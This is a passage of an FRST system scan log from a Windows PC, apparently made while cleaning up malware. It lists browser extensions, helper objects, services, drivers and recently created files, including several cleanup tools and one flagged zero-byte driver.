HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page =
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617911&ResetID=131643942694512768&GUID=72AA9CAC-BF0C-4EEC-B561-2B576365F905
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://se.msn.com/?ocid=iehp
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2017-12-12] (Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre6\bin\ssv.dll [2014-02-01] (Sun Microsystems, Inc.)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office15\URLREDIR.DLL [2014-01-23] (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll [2014-02-01] (Sun Microsystems, Inc.)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office15\URLREDIR.DLL [2014-01-22] (Microsoft Corporation)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL [2017-02-23] (Microsoft Corporation)
DPF: HKLM-x32 {7530BFB8-7293-4D34-9923-61A11451AFC5} hxxp://download.eset.com/special/eos/OnlineScanner.cab
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office\Office15\MSOSB.DLL [2017-08-15] (Microsoft Corporation)

FireFox:
========
FF DefaultProfile: 9am9eglk.default
FF ProfilePath: C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default [2018-03-19]
FF Homepage: Mozilla\Firefox\Profiles\9am9eglk.default -> hxxps://www.malwarebytes.org/restorebrowser/
FF Extension: (Auto Refresh) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\autorefresh@plugin.xpi [2016-04-28] [Legacy]
FF Extension: (bug643770(Stop Autoscroll by mouse wheel)) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\bug643770@alice0775.xpi [2016-04-28] [Legacy]
FF Extension: (Extra Padding When Maximized) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\extrapadding@digitaldj.net.xpi [2016-04-28] [Legacy]
FF Extension: (Paste and Go Hotkey (Keyboard Shortcut)) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\FxExtPasteNGoHtk@github.lostdj.xpi [2016-04-27] [Legacy]
FF Extension: (Gif Delayer) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\jid1-mqCpKcAruymyAA@jetpack.xpi [2016-04-27] [Legacy]
FF Extension: (YouTube ALL HTML5) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\jid1-qj0w91o64N7Eeg@jetpack.xpi [2017-08-29] [Legacy]
FF Extension: ("Manage search engines" button) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\jid1-XGhxOf1M8UPpsQ@jetpack.xpi [2017-09-12] [Legacy]
FF Extension: (No Close Buttons) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\no-close-buttons@xavamedia.nl.xpi [2016-11-02] [Legacy]
FF Extension: (Secure Login) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\secureLogin@blueimp.net.xpi [2017-02-25] [Legacy]
FF Extension: (Super Start) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\superstart@enjoyfreeware.org [2015-12-05] [Legacy]
FF Extension: (Tab Deque) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\tabdeque@sblask.xpi [2017-11-26]
FF Extension: (Tab Kit - Mouse Gestures) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\tabkit.mouse-gestures@pikachuexe.amateur.hk.xpi [2017-03-05] [Legacy]
FF Extension: (uBlock Origin) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\uBlock0@raymondhill.net.xpi [2018-01-15]
FF Extension: (Undo Closed Tabs Button) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\undoclosedtabsbutton@supernova00.biz.xpi [2016-08-26] [Legacy]
FF Extension: (Zotero Connector) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\zotero@chnm.gmu.edu.xpi [2017-12-14]
FF Extension: (Zotero Word for Windows Integration) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\zoteroWinWordIntegration@zotero.org [2016-10-15] [Legacy]
FF Extension: (uBlock) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{2b10c1c8-a11f-4bad-fe9c-1c11e82cac42}.xpi [2015-12-05] [Legacy]
FF Extension: (FT DeepDark) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{77d2ed30-4cd2-11e0-b8af-0800200c9a66} [2017-10-17] [Legacy]
FF Extension: (All-in-One Gestures) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{8b86149f-01fb-4842-9dd8-4d7eb02fd055} [2016-04-27] [Legacy]
FF Extension: (Single Key Tab Switch) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{a66191d8-898b-4a66-89be-d5b279477a54}.xpi [2015-12-31] [Legacy]
FF Extension: (LeechBlock) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{a95d8332-e4b4-6e7f-98ac-20b733364387} [2017-11-15] [Legacy]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_28_0_0_161.dll [2018-02-06] ()
FF Plugin: @java.com/DTPlugin,version=1.6.0_45 -> C:\Windows\system32\npdeployJava1.dll [2014-02-01] (Sun Microsystems, Inc.)
FF Plugin: @java.com/JavaPlugin -> C:\Program Files\Java\jre6\bin\plugin2\npjp2.dll [2014-02-01] (Sun Microsystems, Inc.)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.50907.0\npctrl.dll [2017-05-03] ( Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~2\Office15\NPSPWRAP.DLL [2014-01-23] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_28_0_0_161.dll [2018-02-06] ()
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll [2014-01-06] (Google, Inc.)
FF Plugin-x32: @live.heroesandgenerals.com/npretox -> D:\Spel\Heroes & Generals\live\npretox-1.0.6.1\npretoxlive-1.0.6.1.dll [2014-05-07] (Reto-Moto ApS)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2016-07-19] (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.50907.0\npctrl.dll [2017-05-03] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office15\NPSPWRAP.DLL [2014-01-22] (Microsoft Corporation)
FF Plugin-x32: @mozilla.zeniko.ch/SumatraPDF_Browser_Plugin -> C:\Program Files (x86)\SumatraPDF\npPdfViewer.dll [2013-10-02] (Simon Bünzli)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2018-02-23] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2018-02-23] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-13] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-13] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-02-11] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1755371218-3412237994-1746218496-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Martin\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2015-12-27] (Unity Technologies ApS)
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\defaults\pref\secure_cert.js [2018-03-01]

Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default [2018-03-19]
CHR Extension: (Slides) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-10-19]
CHR Extension: (Docs) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-10-19]
CHR Extension: (Google Drive) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-12-12]
CHR Extension: (YouTube) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-24]
CHR Extension: (Google Search) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-12-12]
CHR Extension: (Sheets) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-10-19]
CHR Extension: (Heroes & Generals) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gbophcdhblbipoaacgchllkobdaolpge [2014-05-11]
CHR Extension: (Google Docs Offline) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-10-20]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-23]
CHR Extension: (Gmail) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-06-15]
CHR Extension: (Chrome Media Router) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-01-23]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

ATTENTION: => Could not perform signature verification. Cryptographic Service is not running.

S4 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [7013384 2018-02-08] ()
S4 DisplayFusionService; C:\Program Files (x86)\DisplayFusion\DisplayFusionService.exe [1375600 2013-11-27] (Binary Fortress Software)
S3 EasyAntiCheat; C:\Windows\SysWOW64\EasyAntiCheat.exe [399120 2017-02-13] (EasyAntiCheat Ltd)
S4 HiPatchService; D:\Spel\Tribes Ascend\HiPatchService.exe [9728 2017-07-12] (Hi-Rez Studios)
S4 HnGSteamService; D:\Spel\Steam Library\steamapps\common\Heroes & Generals\hngservice.exe [777000 2018-02-27] (Reto-Moto ApS)
S2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6234056 2017-11-01] (Malwarebytes)
R2 MsMpSvc; C:\Program Files\Microsoft Security Client\MsMpEng.exe [119864 2016-11-14] (Microsoft Corporation)
S3 NisSrv; C:\Program Files\Microsoft Security Client\NisSrv.exe [361816 2016-11-14] (Microsoft Corporation)
S4 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [519992 2018-01-10] (NVIDIA Corporation)
S4 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [519992 2018-01-10] (NVIDIA Corporation)
S4 Origin Client Service; D:\Spel\Origin\OriginClientService.exe [2122248 2016-06-25] (Electronic Arts)
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [66872 2013-11-11] ()
R2 PnkBstrB; C:\Windows\SysWOW64\PnkBstrB.exe [107832 2013-11-11] ()
S4 Razer Game Scanner Service; C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe [189264 2016-09-25] ()
S4 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1776864 2017-05-23] (Safer-Networking Ltd.)
S4 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2131760 2017-05-23] (Safer-Networking Ltd.)
S4 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [233936 2017-05-23] (Safer-Networking Ltd.)
S4 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [5419792 2014-11-28] (TeamViewer GmbH)
S4 TunngleService; C:\Program Files (x86)\Tunngle\TnglCtrl.exe [814064 2015-12-22] (Tunngle.net GmbH)
S4 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
S4 WsAppService; C:\Program Files (x86)\Wondershare\WAF\2.4.2.223\WsAppService.exe [473312 2017-03-20] (Wondershare)
S4 NVDisplay.ContainerLocalSystem; "C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000
S4 NvTelemetryContainer; "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe" -s NvTelemetryContainer -f "C:\ProgramData\NVIDIA\NvTelemetryContainer.log" -l 3 -d "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\plugins" -r

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 dtsoftbus01; C:\Windows\System32\DRIVERS\dtsoftbus01.sys [283064 2013-10-18] (Disc Soft Ltd)
R3 ElbyCDFL; C:\Windows\System32\Drivers\ElbyCDFL.sys [40648 2007-02-16] (SlySoft, Inc.)
R3 ElbyCDFL; C:\Windows\SysWOW64\Drivers\ElbyCDFL.sys [40648 2007-02-16] (SlySoft, Inc.)
S3 hitmanpro37; C:\Windows\system32\drivers\hitmanpro37.sys [43664 2015-05-08] ()
S3 I1KBFLTR; C:\Windows\System32\drivers\I1KBFLTR.sys [29440 2014-06-26] ()
S3 massfilter_hs; C:\Windows\system32\drivers\massfilter_hs.sys [20232 2012-06-08] (HandSet Incorporated)
S3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [253880 2018-03-02] (Malwarebytes)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [295000 2016-08-25] (Microsoft Corporation)
S3 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [135928 2016-08-25] (Microsoft Corporation)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [31024 2018-01-10] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [59240 2017-12-15] (NVIDIA Corporation)
R3 nvvhci; C:\Windows\System32\DRIVERS\nvvhci.sys [57976 2017-11-16] (NVIDIA Corporation)
S3 OCUSBVID; C:\Windows\System32\DRIVERS\OCUSBVID.sys [62072 2015-06-16] (Oculus VR, LLC)
R3 rzdaendpt; C:\Windows\System32\DRIVERS\rzdaendpt.sys [43720 2015-08-13] (Razer Inc)
S3 rzp1endpt; C:\Windows\System32\DRIVERS\rzp1endpt.sys [50904 2015-08-13] (Razer Inc)
R2 rzpmgrk; C:\Windows\system32\drivers\rzpmgrk.sys [44144 2016-09-17] (Razer, Inc.)
R2 rzpnk; C:\Windows\system32\drivers\rzpnk.sys [130880 2015-12-14] (Razer, Inc.)
R3 rzvkeyboard; C:\Windows\System32\DRIVERS\rzvkeyboard.sys [44232 2015-08-13] (Razer Inc)
S3 rzvmouse; C:\Windows\System32\DRIVERS\rzvmouse.sys [42712 2015-08-13] (Razer Inc)
S3 SaiK075C; C:\Windows\System32\DRIVERS\SaiK075C.sys [179872 2014-08-05] (Saitek)
R3 SaiMini; C:\Windows\System32\DRIVERS\SaiMini.sys [25120 2013-04-30] (Saitek)
R3 SaiNtBus; C:\Windows\System32\drivers\SaiBus.sys [52640 2013-04-30] (Saitek)
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [381440 2013-10-18] (Duplex Secure Ltd.)
S3 ssdevfactory; C:\Windows\System32\DRIVERS\ssdevfactory.sys [46408 2017-06-02] (SteelSeries ApS)
R3 tap0901t; C:\Windows\System32\DRIVERS\tap0901t.sys [47736 2015-12-21] (Tunngle.net)
S3 xb1usb; C:\Windows\System32\DRIVERS\xb1usb.sys [34016 2014-05-27] (Microsoft Corporation)
S3 zghsmdm; C:\Windows\System32\DRIVERS\zghsmdm.sys [131080 2012-06-08] (ZTE Incorporated)
U3 ayj9xjuk; C:\Windows\System32\Drivers\ayj9xjuk.sys [0 ] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-03-18 09:03 - 2018-03-19 16:59 - 000000000 ____D C:\FRST
2018-03-02 11:07 - 2018-03-02 11:11 - 000000000 ____D C:\AdwCleaner
2018-03-02 10:21 - 2018-03-19 16:56 - 000000258 __RSH C:\ProgramData\ntuser.pol
2018-03-02 09:25 - 2018-03-02 09:25 - 000255928 _____ (Malwarebytes) C:\Windows\system32\Drivers\642A2717.sys
2018-03-02 09:16 - 2018-03-19 16:55 - 000192952 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2018-03-02 09:16 - 2018-03-02 09:44 - 000000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2018-03-02 09:16 - 2018-03-02 09:16 - 000255928 _____ (Malwarebytes) C:\Windows\system32\Drivers\5143D20B.sys
2018-03-02 09:16 - 2018-03-02 09:16 - 000000000 ____D C:\Program Files (x86)\mbar
2018-03-02 08:24 - 2018-03-02 08:24 - 000001404 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
2018-03-02 08:24 - 2018-03-02 08:24 - 000001392 _____ C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk
2018-03-02 08:24 - 2018-03-02 08:24 - 000000656 _____ C:\Windows\Tasks\Check for updates (Spybot - Search & Destroy).job
2018-03-02 08:24 - 2018-03-02 08:24 - 000000628 _____ C:\Windows\Tasks\Refresh immunization (Spybot - Search & Destroy).job
2018-03-02 08:24 - 2018-03-02 08:24 - 000000458 _____ C:\Windows\Tasks\Scan the system (Spybot - Search & Destroy).job
2018-03-02 08:24 - 2018-03-02 08:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2018-03-02 08:24 - 2017-05-23 09:22 - 000032240 _____ (Safer-Networking Ltd.) C:\Windows\system32\sdnclean64.exe
2018-03-02 08:21 - 2018-03-02 08:21 - 000000085 _____ C:\Windows\wininit.ini
2018-03-02 08:11 - 2018-03-19 16:56 - 000000258 __RSH C:\Users\Martin\ntuser.pol
2018-03-02 08:11 - 2018-03-02 08:11 - 000000000 _____ C:\Users\Martin\AppData\Local\{9D703F0F-0DEB-403A-ABF0-858F9D72DBB8}
2018-03-02 07:57 - 2018-03-02 07:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2018-03-01 17:27 - 2018-03-01 17:27 - 000000000 ____D C:\Program Files\Malwarebytes
2018-03-01 17:27 - 2017-11-29 09:11 - 000077432 _____ C:\Windows\system32\Drivers\mbae64.sys
2018-03-01 17:14 - 2018-03-19 16:50 - 001422732 _____ C:\Windows\ntbtlog.txt
2018-03-01 17:10 - 2018-03-01 17:10 - 000001032 _____ C:\Users\Public\Desktop\Lightning.lnk
2018-03-01 17:10 - 2018-03-01 17:10 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lightning
2018-03-01 17:10 - 2018-03-01 17:10 - 000000000 ____D C:\Program Files (x86)\Lightning
2018-03-01 17:09 - 2018-03-02 09:14 - 000000000 ____D C:\Disk
2018-03-01 17:09 - 2018-03-02 08:00 - 000000000 ____D C:\Windat
2018-03-01 17:09 - 2018-03-01 17:09 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lookup Pro
2018-03-01 17:09 - 2018-03-01 17:09 - 000000000 ____D C:\Program Files\LaCie Private Public
2018-03-01 17:08 - 2018-03-01 17:29 - 000000824 _____ C:\Users\UpdatusUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2018-03-01 17:08 - 2018-03-01 17:29 - 000000824 _____ C:\Users\Martin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2018-03-01 11:52 - 2018-03-01 11:52 - 000088024 _____ C:\Windows\system32\Drivers\ddd6ebd91f4ecf7d7f74107288edb1a0.sys
2018-02-26 15:18 - 2018-02-26 15:18 - 000000000 ____D C:\Windows\system32\Drivers\NVIDIA Corporation
2018-02-26 15:18 - 2018-02-26 15:18 - 000000000 ____D C:\Program Files (x86)\VulkanRT
2018-02-26 15:18 - 2018-02-23 20:28 - 000136536 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvStreaming.exe
2018-02-26 15:18 - 2017-12-08 23:25 - 000798520 _____ C:\Windows\SysWOW64\vulkan-1.dll
2018-02-26 15:18 - 2017-12-08 23:25 - 000490808 _____ C:\Windows\SysWOW64\vulkaninfo.exe
2018-02-26 15:18 - 2017-12-08 23:24 - 000928568 _____ C:\Windows\system32\vulkan-1.dll
2018-02-26 15:18 - 2017-12-08 23:24 - 000591672 _____ C:\Windows\system32\vulkaninfo.exe
2018-02-26 15:17 - 2018-02-25 06:41 - 035619872 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglv64.dll
2018-02-26 15:17 - 2018-02-25 06:40 - 028201048 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglv32.dll
2018-02-26 15:17 - 2018-02-25 06:40 - 017353248 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvlddmkm.sys
2018-02-26 15:17 - 2018-02-25 06:40 - 000996768 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFR64.dll
2018-02-26 15:17 - 2018-02-25 06:40 - 000625512 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFROpenGL.dll
2018-02-26 15:17 - 2018-02-25 06:40 - 000514544 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFROpenGL.dll
2018-02-26 15:17 - 2018-02-25 06:39 - 000948128 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFR.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 040277488 _____ (NVIDIA Corporation) C:\Windows\system32\nvcompiler.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 003913016 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuvid.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 003443800 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuvid.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 001985384 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispco6439101.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 001684000 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispgenco6439101.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 001137512 _____ (NVIDIA Corporation) C:\Windows\system32\NvFBC64.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 001064760 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvFBC.dll
2018-02-26 15:17 - 2018-02-25 06:37 - 035188640 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcompiler.dll
2018-02-26 15:17 - 2018-02-25 06:36 - 019854312 _____ (NVIDIA Corporation) C:\Windows\system32\nvopencl.dll
2018-02-26 15:17 - 2018-02-25 06:36 - 013571008 _____ (NVIDIA Corporation) C:\Windows\system32\nvptxJitCompiler.dll
2018-02-26 15:17 - 2018-02-25 06:36 - 011131696 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvptxJitCompiler.dll
2018-02-26 15:17 - 2018-02-25 06:36 - 000419488 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvumdshim.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 016496080 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvopencl.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 001153752 _____ (NVIDIA Corporation) C:\Windows\system32\nvfatbinaryLoader.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000902280 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvfatbinaryLoader.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000541672 _____ (NVIDIA Corporation) C:\Windows\system32\nvEncodeAPI64.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000460024 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvEncodeAPI.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000182600 _____ (NVIDIA Corporation) C:\Windows\system32\nvinitx.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000164952 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglshim64.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000159712 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvinit.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000142816 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglshim32.dll
2018-02-26 15:17 - 2018-02-25 06:34 - 018910384 _____ (NVIDIA Corporation) C:\Windows\system32\nvd3dumx.dll
2018-02-26 15:17 - 2018-02-25 06:34 - 012966032 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuda.dll
2018-02-26 15:17 - 2018-02-25 06:34 - 011000288 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuda.dll
2018-02-26 15:17 - 2018-02-25 06:34 - 003918512 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvapi.dll
2018-02-26 15:17 - 2018-02-24 13:46 - 000000669 _____ C:\Windows\SysWOW64\nv-vk32.json
2018-02-26 15:17 - 2018-02-24 13:46 - 000000669 _____ C:\Windows\system32\nv-vk64.json
2018-02-26 14:45 - 2017-12-15 03:03 - 000059240 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvvad64v.sys
2018-02-23 15:09 - 2018-02-23 15:09 - 000000000 ____D C:\Users\Martin\AppData\LocalLow\Piece of Cake studios

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-03-19 16:56 - 2013-10-17 21:32 - 000000000 ____D C:\Users\Martin
2018-03-19 16:56 - 2009-07-14 05:45 - 000016640 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2018-03-19 16:56 - 2009-07-14 05:45 - 000016640 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
